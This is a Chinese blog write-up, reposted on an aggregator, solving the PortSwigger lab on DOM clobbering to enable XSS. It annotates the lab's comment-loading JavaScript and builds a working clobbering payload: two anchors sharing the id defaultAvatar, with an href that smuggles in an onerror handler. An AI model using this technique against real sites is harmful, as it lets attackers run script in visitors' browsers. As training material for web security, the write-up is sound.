portswigger的Exploiting DOM clobbering to enable XSS

news2024/11/15 6:59:50

目录

尝试一下看看可不可以XSS

DOM破坏

查看源码确定DOM破坏漏洞点以及代码分析

首先查看/resources/labheader/js/labHeader.js,没有什么作用

然后domPurify这东西是一个过滤框架也没啥子用

看/resources/js/loadCommentsWithDomClobbering.js尝试分析代码(对于代码的分析在注释中)

技巧

payload构造


尝试一下看看可不可以XSS

首先进入一个评论区进行评论,然后尝试xss

HTML is allowd这里是用textarea标签提交,这没有办法插入

然后再下面尝试xss,无法成功

然后查看源码发现都被过滤了

DOM破坏

查看源码确定DOM破坏漏洞点以及代码分析

DOM破坏肯定是要看js的我们打开源码查看一下,发现了如下图的代码

首先查看/resources/labheader/js/labHeader.js,没有什么作用

completedListeners = [];

(function () {
    let labHeaderWebSocket = undefined;
    function openWebSocket() {
        return new Promise(res => {
            if (labHeaderWebSocket) {
                res(labHeaderWebSocket);
                return;
            }

            let newWebSocket = new WebSocket(location.origin.replace("http", "ws") + "/academyLabHeader");

            newWebSocket.onopen = function (evt) {
                res(newWebSocket);
            };

            newWebSocket.onmessage = function (evt) {
                const labSolved = document.getElementById('notification-labsolved');
                const keepAliveMsg = evt.data === 'PONG';
                if (labSolved || keepAliveMsg) {
                    return;
                }
                document.getElementById("academyLabHeader").innerHTML = evt.data;
                animateLabHeader();

                for (const listener of completedListeners) {
                    listener();
                }
            };

            setInterval(() => {
                newWebSocket.send("PING");
            }, 5000)
        });
    }

    labHeaderWebSocket = openWebSocket();
})();

function animateLabHeader() {
    setTimeout(function() {
        const labSolved = document.getElementById('notification-labsolved');
        if (labSolved)
        {
            let cl = labSolved.classList;
            cl.remove('notification-labsolved-hidden');
            cl.add('notification-labsolved');
        }

    }, 500);
}

然后domPurify这东西是一个过滤框架也没啥子用

看/resources/js/loadCommentsWithDomClobbering.js尝试分析代码(对于代码的分析在注释中)

function loadComments(postCommentPath) {
    let xhr = new XMLHttpRequest();
    xhr.onreadystatechange = function() {
        if (this.readyState == 4 && this.status == 200) {
            let comments = JSON.parse(this.responseText);
            displayComments(comments);
        }
    };
    xhr.open("GET", postCommentPath + window.location.search);
    xhr.send();

// 创建一个新的 XMLHttpRequest 对象 xhr。
// 设置 onreadystatechange 事件处理函数,检查请求的状态(readyState 为 4 表示请求完成,status 为 200 表示请求成功)
//在请求完成后,将解析后的评论数据传递给 displayComments 函数
// 使用 GET 方法发起请求,URL 由 postCommentPath 和当前页面的查询参数组成(window.location.search)
    

    function escapeHTML(data) {
        return data.replace(/[<>'"]/g, function(c){
            return '&#' + c.charCodeAt(0) + ';';
        })
    }
//对输入内容进行实体编码,让其无法进入标签开始状态
    function displayComments(comments) {
        let userComments = document.getElementById("user-comments");
//获取id,用于显示评论
        for (let i = 0; i < comments.length; ++i)
        {
            comment = comments[i];
            let commentSection = document.createElement("section");
            commentSection.setAttribute("class", "comment");

            let firstPElement = document.createElement("p");
//遍历 comments 数组中的每个评论对象。
// 为每个评论创建一个新的 <section> 元素,并设置其 class 属性为 "comment"。
// 创建一个新的 <p> 元素,用于显示评论的作者、日期和头像。


            let defaultAvatar = window.defaultAvatar || {avatar: '/resources/images/avatarDefault.svg'}
            let avatarImgHTML = '<img class="avatar" src="' + (comment.avatar ? escapeHTML(comment.avatar) : defaultAvatar.avatar) + '">';

            let divImgContainer = document.createElement("div");
            divImgContainer.innerHTML = avatarImgHTML
// 使用 defaultAvatar 对象提供一个默认头像(如果 window.defaultAvatar 不存在,则使用默认路径)
//     创建一个包含头像 <img> 标签的 HTML 字符串,并设置头像的 src 属性,如果 comment.avatar存在,它会将 comment.avatar 经过 escapeHTML 函数处理后作为头像URL。如果 comment.avatar 不存在,则使用 defaultAvatar.avatar 作为默认头像URL
//     将头像的 HTML 插入到一个新的 <div> 元素中

            if (comment.author) {
                if (comment.website) {
                    let websiteElement = document.createElement("a");
                    websiteElement.setAttribute("id", "author");
                    websiteElement.setAttribute("href", comment.website);
                    firstPElement.appendChild(websiteElement)
                }

                let newInnerHtml = firstPElement.innerHTML + DOMPurify.sanitize(comment.author)
                firstPElement.innerHTML = newInnerHtml
            }

            if (comment.date) {
                let dateObj = new Date(comment.date)
                let month = '' + (dateObj.getMonth() + 1);
                let day = '' + dateObj.getDate();
                let year = dateObj.getFullYear();

                if (month.length < 2)
                    month = '0' + month;
                if (day.length < 2)
                    day = '0' + day;

                dateStr = [day, month, year].join('-');

                let newInnerHtml = firstPElement.innerHTML + " | " + dateStr
                firstPElement.innerHTML = newInnerHtml
            }

            firstPElement.appendChild(divImgContainer);

            commentSection.appendChild(firstPElement);

            if (comment.body) {
                let commentBodyPElement = document.createElement("p");
                commentBodyPElement.innerHTML = DOMPurify.sanitize(comment.body);

                commentSection.appendChild(commentBodyPElement);
            }
            commentSection.appendChild(document.createElement("p"));

            userComments.appendChild(commentSection);

//如果评论对象中有 body,则创建一个新的 <p> 元素来显示评论内容,并使用 DOMPurify.sanitize 进行清理。
//将清理后的评论内容 <p> 元素添加到评论部分。
//还会在每个评论后添加一个空的 <p> 元素(可能是为了间距)。
//最后,将创建的评论部分添加到 userComments 元素中。
        }
    }
};

然后我们的注入点在这里,这里非常可疑

我们开始是没有头像的所以我们开始会走到window.defaultAvatar上,所以只要我们想办法构造一个 defaultAvatar.avatar就可以进行XSS了

技巧

然后我们借助一个js特性,看下面两张图id相同时不同的值的取法

然后如果是a标签的话获取属性后会将a标签的href的值进行一个toString方法传进去

具体看下面最后一道题目的解

xss.pwnfunction-Easy-CSDN博客

payload构造

首先闭合下面双引号

所以下面构造的时候1后面要加双引号但是加双引号的时候会出现问题,无法闭合,我们尝试是用HTML实体编码

<a id=defaultAvatar><a id=defaultAvatar name="avatar" href="1&quot; onerror=alert(1)//">

尝试XSS,这里还是不行,"还是会被编码

然后是用一个小技巧,是用一个不存在的伪协议,然后这个伪协议不存在,后面&quot就不会被编码

<a id=defaultAvatar><a id=defaultAvatar name=avatar href="AS:&quot; onerror=alert(1)//">

再从新输入一次评论

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2054574.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

使用Poi-tl对word模板生成动态报告

一、pom依赖问题&#xff1a; <dependency> <groupId>com.deepoove</groupId> <artifactId>poi-tl</artifactId> <version>1.12.2</version> </dependency> 使用 poi-tl 的 1.12.2版本&#xff0c;如果使用了poi依赖&#x…

【编程之路:在 Bug 的迷宫中寻找出口】

&#x1f49d;&#x1f49d;&#x1f49d;欢迎来到我的博客&#xff0c;很高兴能够在这里和您见面&#xff01;希望您在这里可以感受到一份轻松愉快的氛围&#xff0c;不仅可以获得有趣的内容和知识&#xff0c;也可以畅所欲言、分享您的想法和见解。 推荐:kwan 的首页,持续学…

Mysql-linux通过rpm安装、linux离线安装mysql

新建用户 useradd mysql passwd mysqlmysql用户增加sudo权限 Linux-创建用户、给普通用户sudo权限、设置不需要密码执行sudo 卸载旧版本软件包 卸载mariadb --查询mariadb版本 rpm -qa|grep mariadb --控制台输出 mariadb-libs-5.5.68-1.el7.x86_64 --执行卸载 sudo rpm -…

系规学习第13天

1、规划设计的主要目的不包括() A、设计满足业务需求的IT服务 B、设计SLA、测量方法和指标。 C、设计服务过程及其控制方 D、设计实施规划所需要的进度管理过程 [答案] D [解析]本题考察的是规划设计的目的&#xff0c;建议掌握。 (1)设计满足业务需求的IT服务。 (2)设…

Python计算机视觉 第1章-基本的图像操作和处理

Python计算机视觉 第1章-基本的图像操作和处理 本章讲解操作和处理图像的基础知识&#xff0c;将通过大量示例介绍处理图像所需的Python工具包&#xff0c;并介绍用于读取图像、图像转换和缩放、计算导数、画图和保存结果等的基本工具。 1.1 PIL&#xff1a;Python图像处理类…

零基础学习Redis(4) -- 常用数据结构介绍

我们之前提到过&#xff0c;redis中key只能是字符串类型&#xff0c;而value有多种类型。 redis中的数据结构有自己独特的实现方式能根据特定的场景进行优化 1. string(字符串) 内部编码&#xff1a; raw&#xff1a;最基本的字符串&#xff0c;类比我们平常使用的Stringin…

MFC读取 Excel

2.添加读取excel数据的接口类&#xff1a; 添加读取excel的接口类&#xff1a; 3、添加完成后&#xff0c;找到这几个接口类的头文件&#xff0c;注释/删除 下图红框中的引入语句 注意&#xff1a;每个接口类的头文件都需进行处理。 4、添加源文件 excel.h文件&#xff1a; …

Spring websocket并发发送消息异常的解决

https://www.jb51.net/program/297186nkq.htm本文主要介绍了 Spring websocket并发发送消息异常的解决,当多个线程同时尝试通过 WebSocket 会话发送消息时,会抛出异常,下面就来解决一下,感兴趣的可以了解一下https://www.jb51.net/program/297186nkq.htm

centos系统配置转发和iptables使之成为网关

centos系统配置转发和iptables使之成为网关 在当下互联网环境中&#xff0c;有很多内网服务器不能出网&#xff0c;例如安装软件包&#xff0c;更新程序之类的&#xff0c;偶尔会需要出网&#xff0c;下面这种方式就是专门解决这个事情的。 如下配置在 centos 6 7 8 rocky 8 …

FPGA 最小系统 EP2C5T144C8N

参考 &#xff1a; 微雪 ep2c5t 米尔 所需元件&#xff1a; 1.2v 3.3v稳压芯片 7个10k电阻 一个use blast 5v-》3.3v稳压-》1.2v稳压 1.JTAG连接 JTAG连接 NSTATUS nconfig config_done 因为没有外部存储器&#xff0c;直接使用Jtag烧录&#xff0c;从而nconfig 为3.3 &…

全场景——(三)USB开发基础(2)

文章目录 一、USB 描述符1.1 USB 设备状态切换图1.2 标准设备请求1.2.1 SETUP事务的数据格式1.2.2 标准设备请求1.2.3 设备/配置/接口/端点 1.3 描述符1.3.1 设备描述符1.3.2 配置描述符1.3.3 接口描述符1.3.4 端点描述符1.3.5 示例 1.4 设备枚举过程示例 二、USBX 组件2.1 Azu…

Rhinoceros 8 for Mac/Win:重塑三维建模边界的革新之作

Rhinoceros 8&#xff08;简称Rhino 8&#xff09;&#xff0c;作为一款由Robert McNeel & Assoc公司开发的顶尖三维建模软件&#xff0c;无论是对于Mac还是Windows用户而言&#xff0c;都是一款不可多得的高效工具。Rhino 8以其强大的功能、广泛的应用领域以及卓越的性能&…

阿里云发送短信功能(Java)

&#xff08;1&#xff09;注册用户&#xff0c;并且开通短信套餐 &#xff08;2&#xff09; 点击快速学习&#xff0c;然后绑定测试的手机号码。 选用专用测试签名&#xff08;自定义的话阿里可能会验证什么什么的比较麻烦&#xff09; 然后在选取调用API &#xff08;3&…

Excel ——3个实用的随机函数(RAND 、RANDBETWEEN、RANDARRAY)

1、RAND 函数 RAND 函数是一个没有参数的函数&#xff1a;RAND () 返回一个大于等于 0&#xff0c;小于 1 的随机实数。 选中任一单元格&#xff0c;在编辑栏输入公式&#xff1a; 如果要生成 a 与 b 之间的随机数&#xff0c;就用&#xff1a; RAND()*(b-a)a 比如要生成-5…

Docker Compose运行Elasticsearch

前提&#xff1a;确保你已经安装了Docker和Docker Compose 创建项目目录 创建一个目录来存放项目文件 mkdir es cd es 创建docker-compose.yml文件 touch docker-compose.yml version: 3.3 services: elasticsearch: image: docker.elastic.co/elasticsearch/elastics…

mysql windows、Ubuntu安装与远程连接配置

下载 在Windows下安装MySQL需要在官网下载安装包 官网地址www.mysql.com 找到社区下载 选择适用于Windows的MYSQL安装程序 选择自己电脑对应的版本和所要下载的mysql版本一般是5.7版本和8.0版本 按照图片上的选项进行安装 到此就安装完成了 需要自己手动配置环境变量…

光纤猫光功率正常值是多少

光纤猫光功率正常值是多少 1. 光猫发送的光功率正常范围为负15dBm。 2. 光猫接收的光功率理想值为负9dBm至负27dBm。 3. 光模块发射的光功率应为0dBm或正1dBm以上。 4. 光信号通过一级光交箱跳纤会损失1到2dBm&#xff0c;因此到达一级光分箱的主纤光功率为负2dBm。 5. 经过一级…

模拟实现Stack的适配器【栈】【C++】

P. S.&#xff1a;以下代码均在VS2022环境下测试&#xff0c;不代表所有编译器均可通过。 P. S.&#xff1a;测试代码均未展示头文件stdio.h的声明&#xff0c;使用时请自行添加。 博主主页&#xff1a;LiUEEEEE                        …

sentinel 02 核心类

01 02. 03. 04. 05. 4.1 4.2 4.3 4.4 5调用链

JavaScript学习笔记(十二):JS Web API

1、Web API - 简介 Web API 是开发人员的梦想。 它可以扩展浏览器的功能它可以极大简化复杂的功能它可以为复杂的代码提供简单的语法 1.1 什么是 Web API&#xff1f; API 指的是应用程序编程接口&#xff08;Application Programming Interface&#xff09;。 Web API 是 …